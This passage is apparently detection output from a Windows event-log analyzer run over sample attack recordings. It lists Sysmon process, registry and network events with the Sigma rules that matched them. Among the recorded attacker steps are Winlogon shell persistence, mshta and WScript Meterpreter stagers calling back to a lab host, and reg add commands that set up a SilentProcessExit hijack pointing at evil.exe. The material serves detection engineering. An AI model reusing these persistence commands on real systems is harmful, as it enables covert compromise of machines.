""00000000"" ""000005B8"" ""000004B0"" | Process: C:\Windows\System32\drvinst.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 1128 | PGUID: 365ABB72-9999-5CEC-0000-0010EB5A1700 | Hash: SHA1=2D42A8EABA2829A1641FC580DA5E337C75997A99,MD5=44DAF0A410AB80E7CAB7C12EDE5FFB34,SHA256=3493630EE740508D0DB760A7648470F2987752D9B205CCCA805A66C3524E2B58,IMPHASH=ED4425CF217058DA6BDF611263E571DD",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 02:14:50.413 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""c:\windows\System32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: IEWIN7\IEUser | Parent Cmd: vshadow.exe -nw -exec=c:\windows\System32\notepad.exe c:\ | LID: 0x14a73 | PID: 1516 | PGUID: 365ABB72-999A-5CEC-0000-0010C3A11700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_lolbin_bohops_vshadow_exec.evtx +2019-05-28 23:09:38.589 +00:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon 
Alert,Persistence - Startup User Shell Folder Modified | SetValue: HKU\S-1-5-21-3583694148-1414552638-2922671848-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\startup: c:\programdata\StartupNewHomeAddress | Process: C:\Windows\system32\reg.exe | PID: 1520 | PGUID: 365ABB72-BFB2-5CED-0000-0010F2C03600,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_startup_UserShellStartup_Folder_Changed_sysmon_13.evtx +2019-06-14 22:22:17.988 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Downloads\a.exe"" | Process: C:\Users\IEUser\Downloads\a.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1336d | PID: 4020 | PGUID: 365ABB72-1E19-5D04-0000-0010DFC60A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:22:21.503 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe | Process: C:\Users\IEUser\Downloads\a.exe | PID: 4020 | PGUID: 365ABB72-1E19-5D04-0000-0010DFC60A00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:22:21.503 +00:00,IEWIN7,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:22:21.535 +00:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - Winlogon Shell | SetValue: HKU\S-1-5-21-3583694148-1414552638-2922671848-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"",explorer.exe | Process: C:\Users\IEUser\Downloads\a.exe | PID: 4020 | PGUID: 
365ABB72-1E19-5D04-0000-0010DFC60A00",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:22:21.535 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Downloads\a.exe"" | Process: C:\Users\IEUser\Downloads\a.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\a.exe"" | LID: 0x1336d | PID: 1008 | PGUID: 365ABB72-1E1D-5D04-0000-001003E70A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:22:21.535 +00:00,IEWIN7,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:22:31.957 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious WMI module load | Image: C:\Windows\System32\wbem\wmiutils.dll | Process: C:\Users\IEUser\Downloads\a.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1008 | PGUID: 365ABB72-1E1D-5D04-0000-001003E70A00 | Hash: SHA1=03DC8ABDF9C9948FE6E783DCA9C6C8264D635F0A,MD5=5610B0425518D185331CB8E968D060E6,SHA256=E235186C3BF266EE9EC733D2CFF35E3A65DE039C19B14260F4054F34B5E8AD41,IMPHASH=523D1DB34FC36465E35F6201A2FD561B",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:22:31.957 +00:00,IEWIN7,7,info,Exec,WMI Modules Loaded,,rules/sigma/image_load/image_load_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:22:32.222 +00:00,IEWIN7,1,info,,Process Created,"Cmd: 
""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmpA185.tmp"" | Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\a.exe"" | LID: 0x1336d | PID: 1584 | PGUID: 365ABB72-1E28-5D04-0000-0010EC030B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:22:47.253 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 1552 | PGUID: 365ABB72-1E37-5D04-0000-001049360B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:22:52.457 +00:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Downloads\a.exe | PID: 1008 | PGUID: 365ABB72-1E1D-5D04-0000-001003E70A00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:22:52.503 +00:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Downloads\a.exe | PID: 4020 | PGUID: 365ABB72-1E19-5D04-0000-0010DFC60A00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:22:55.441 +00:00,IEWIN7,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 00000040 | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 688 | PGUID: 365ABB72-1E3F-5D04-0000-0010EC890B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx 
+2019-06-14 22:22:55.503 +00:00,IEWIN7,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 00000040 | LID: 0x3e7 | PID: 488 | PGUID: 365ABB72-1E3F-5D04-0000-0010568A0B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:22:55.566 +00:00,IEWIN7,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 00000040 | LID: 0x3e7 | PID: 1228 | PGUID: 365ABB72-1E3F-5D04-0000-0010FF8D0B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:22:55.707 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 948 | PGUID: 365ABB72-1E3F-5D04-0000-00102B9C0B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:23:06.691 +00:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Process: C:\Windows\System32\dllhost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x3e7 | PID: 2128 | PGUID: 
365ABB72-1E4A-5D04-0000-0010ECC20B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:23:07.019 +00:00,IEWIN7,1,info,,Process Created,Cmd: efsui.exe /efs /keybackup | Process: C:\Windows\System32\efsui.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\lsass.exe | LID: 0xbc013 | PID: 2264 | PGUID: 365ABB72-1E4A-5D04-0000-0010BACF0B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:23:07.082 +00:00,IEWIN7,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: IEWIN7\IEUser | Parent Cmd: winlogon.exe | LID: 0xbc013 | PID: 1628 | PGUID: 365ABB72-1E4A-5D04-0000-001016D70B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:23:13.894 +00:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\userinit.exe | Process: C:\Windows\System32\userinit.exe | User: IEWIN7\IEUser | Parent Cmd: winlogon.exe | LID: 0xbc013 | PID: 3448 | PGUID: 365ABB72-1E51-5D04-0000-00104C340C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:23:13.957 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" | Process: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0xbc013 | PID: 3444 | PGUID: 365ABB72-1E51-5D04-0000-00107B380C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:23:13.957 
+00:00,IEWIN7,1,medium,Evas,Suspicious Userinit Child Process,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_userinit_child.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:23:13.957 +00:00,IEWIN7,1,high,Persis,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation_sysmon/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:23:13.972 +00:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0xbc013 | PID: 3620 | PGUID: 365ABB72-1E51-5D04-0000-001065390C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:23:15.054 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\VBoxTray.exe"" | Process: C:\Windows\System32\VBoxTray.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xbc013 | PID: 3920 | PGUID: 365ABB72-1E52-5D04-0000-00101D700C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:23:16.592 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" | Process: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" | LID: 0xbc013 | PID: 1724 | PGUID: 365ABB72-1E54-5D04-0000-0010B7B30C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:23:23.405 
+00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xbc013 | PID: 2040 | PGUID: 365ABB72-1E5B-5D04-0000-00109EF80C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:23:26.811 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious WMI module load | Image: C:\Windows\System32\wbem\wmiutils.dll | Process: C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1724 | PGUID: 365ABB72-1E54-5D04-0000-0010B7B30C00 | Hash: SHA1=03DC8ABDF9C9948FE6E783DCA9C6C8264D635F0A,MD5=5610B0425518D185331CB8E968D060E6,SHA256=E235186C3BF266EE9EC733D2CFF35E3A65DE039C19B14260F4054F34B5E8AD41,IMPHASH=523D1DB34FC36465E35F6201A2FD561B",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:23:26.811 +00:00,IEWIN7,7,info,Exec,WMI Modules Loaded,,rules/sigma/image_load/image_load_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:23:26.999 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"" /stext ""C:\Users\IEUser\AppData\Local\Temp\tmp7792.tmp"" | Process: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\AppData\Roaming\9QxTsAU9w8gyPj4w\BRE6BgE2JubB.exe"" | LID: 0xbc013 | PID: 2980 | PGUID: 365ABB72-1E5E-5D04-0000-0010EF5E0D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-14 22:23:53.358 
+00:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Process: C:\Windows\System32\dllhost.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0xbc013 | PID: 3284 | PGUID: 365ABB72-1E79-5D04-0000-0010EADE0E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_13_1_persistence_via_winlogon_shell.evtx +2019-06-15 07:13:42.294 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mshta.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta"" | Process: C:\Windows\System32\mshta.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\update.html | LID: 0x135a4 | PID: 652 | PGUID: 365ABB72-9AA6-5D04-0000-00109C850F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 07:13:42.294 +00:00,IEWIN7,1,high,Exec,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 07:13:42.294 +00:00,IEWIN7,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 07:13:42.294 +00:00,IEWIN7,1,high,Exec,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 07:13:44.106 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 
10.0.2.13:49159 (IEWIN7) | Dst: 10.0.2.18:4443 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 652 | PGUID: 365ABB72-9AA6-5D04-0000-00109C850F00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 07:14:32.809 +00:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Process: C:\Windows\System32\dllhost.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x135a4 | PID: 3892 | PGUID: 365ABB72-9AD8-5D04-0000-0010C08C1000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_mshta_sharpshooter_stageless_meterpreter.evtx +2019-06-15 07:21:50.488 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html | Process: C:\Program Files\Internet Explorer\iexplore.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x135a4 | PID: 540 | PGUID: 365ABB72-9C8E-5D04-0000-0010D0421600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 07:21:51.035 +00:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" SCODEF:540 CREDAT:275457 /prefetch:2 | Process: C:\Program Files\Internet Explorer\iexplore.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html | LID: 0x135a4 | PID: 984 | PGUID: 365ABB72-9C8E-5D04-0000-001080561600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 07:22:05.691 +00:00,IEWIN7,1,info,,Process Created,"Cmd: 
""C:\Windows\System32\WScript.exe"" ""C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\updatevbs.vbs"" | Process: C:\Windows\System32\wscript.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Internet Explorer\iexplore.exe"" C:\Users\IEUser\Downloads\updatevbs.html | LID: 0x135a4 | PID: 172 | PGUID: 365ABB72-9C9D-5D04-0000-001039CE1600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 07:22:05.691 +00:00,IEWIN7,1,high,Exec,WScript or CScript Dropper,,rules/sigma/process_creation_sysmon/proc_creation_win_malware_script_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 07:22:05.691 +00:00,IEWIN7,1,high,Exec,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 07:22:05.973 +00:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: C:\Windows\System32\wscript.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 172 | PGUID: 365ABB72-9C9D-5D04-0000-001039CE1600 | Hash: SHA1=F4F7354475114E39447975211F5D0A5FA8DB8367,MD5=77B25423AD769057258786540205F6C8,SHA256=20B2A5B34D764D92028CF5EAB46A91F2F7F1A0ECC3FEBA4FC3CDF881AB3A136C,IMPHASH=EF7BEA73AB4F834F0C44DDE0150B5648",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-15 07:22:08.473 +00:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:49162 (IEWIN7) | Dst: 10.0.2.18:4443 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\wscript.exe | PID: 
172 | PGUID: 365ABB72-9C9D-5D04-0000-001039CE1600,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_vbs_sharpshooter_stageless_meterpreter.evtx +2019-06-19 17:22:37.897 +00:00,IEWIN7,1,info,,Process Created,"Cmd: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe"" /v GlobalFlag /t REG_DWORD /d 512 | Process: C:\Windows\System32\reg.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x134a4 | PID: 1356 | PGUID: 365ABB72-6F5D-5D0A-0000-00109B331300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-19 17:22:41.709 +00:00,IEWIN7,1,info,,Process Created,"Cmd: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v ReportingMode /t REG_DWORD /d 1 | Process: C:\Windows\System32\reg.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x134a4 | PID: 2504 | PGUID: 365ABB72-6F61-5D0A-0000-0010DB351300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-19 17:22:41.709 +00:00,IEWIN7,13,critical,PrivEsc | Persis | Evas,GlobalFlags Registry Persistence Mechanisms,,rules/sigma/registry_sysmon/registry_set/registry_set_globalflags_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-19 17:22:41.709 +00:00,IEWIN7,13,medium,Persis,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_sysmon/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-19 17:22:43.944 +00:00,IEWIN7,13,medium,,Registry 
Key Value Set_Sysmon Alert,Persistence via SilentProcessExit hijack | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe\ReportingMode: DWORD (0x00000001) | Process: C:\Windows\system32\reg.exe | PID: 2504 | PGUID: 365ABB72-6F61-5D0A-0000-0010DB351300,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-19 17:22:43.944 +00:00,IEWIN7,1,info,,Process Created,"Cmd: reg add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe"" /v MonitorProcess /d ""C:\windows\temp\evil.exe"" | Process: C:\Windows\System32\reg.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x134a4 | PID: 1956 | PGUID: 365ABB72-6F63-5D0A-0000-0010F93A1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-19 17:22:43.944 +00:00,IEWIN7,13,critical,PrivEsc | Persis | Evas,GlobalFlags Registry Persistence Mechanisms,,rules/sigma/registry_sysmon/registry_set/registry_set_globalflags_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_SilentProcessExit_ImageHijack_sysmon_13_1.evtx +2019-06-19 17:22:45.694 +00:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence via SilentProcessExit hijack | SetValue: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe\MonitorProcess: C:\windows\temp\evil.exe | Process: C:\Windows\system32\reg.exe | PID: 1956 | PGUID: 